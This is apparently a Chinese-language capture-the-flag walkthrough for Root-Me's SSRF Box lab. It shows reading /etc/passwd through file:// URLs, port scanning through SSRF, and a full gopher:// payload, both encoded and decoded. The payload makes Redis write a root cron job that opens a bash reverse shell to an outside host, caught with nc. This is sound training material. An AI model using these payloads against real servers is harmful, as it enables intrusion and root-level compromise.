Rootme CTF all the day靶场ssrf漏洞

一、漏洞环境

Rootme CTF all the day

漏洞地址：https://www.root-me.org/en/Capture-The-Flag/CTF-all-the-day/

二、测试过程

1、访问漏洞地址，没有账号的话，注册账号，然后进去找到一个处于none的虚拟机，点击房间号进入（如果进去没有看见房间号，在页面最下面找到如下界面，点击就可以进入了）

2、然后进入房间后，选择需要创建的虚拟机，选择SSRF Box，点击保存，选择start the game。然后访问 ctf04.root-me.org 就可以看到启动的虚拟环境了。

3、在页面的输入框中输入百度地址后，会把百度首页加载进来。

读系统文件

1、可以在输入框中随便输一个url，抓包，然后把包发送到Repeater模块，把url后面的内容修改为 file:///etc/passwd，来读取该文件

探测开放的服务器端口

1、将包发送到Intruder模块，端口开放显示为OK，没有开放显示为Connection refused。

2、这里我们已经知道是6379端口了，所以区间就设置的很小（6300-6400）


3、对比6319端口的包和其他的端口的包的区别，6379端口开放，所以显示为OK，其他端口没有开放显示为Connection refused

利用redis写定时任务来反弹shell

要用到一台外网主机，然后使用nc做端口监听。

1、payload：

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/外网IP/2233 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

解码后的内容：

gopher://127.0.0.1:6379/_*3
$3
set
$1
1
$61



*/1 * * * * bash -i >& /dev/tcp/外网IP/2233 0>&1




*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

2、然后将payload放到页面的输入框中

3、在外网机器上开启监听，命令：nc -l 2233，就可以getshell了。

4、然后再到网站目录输入我们找到的falg，就结束了。

参考文章：https://www.freebuf.com/column/227309.html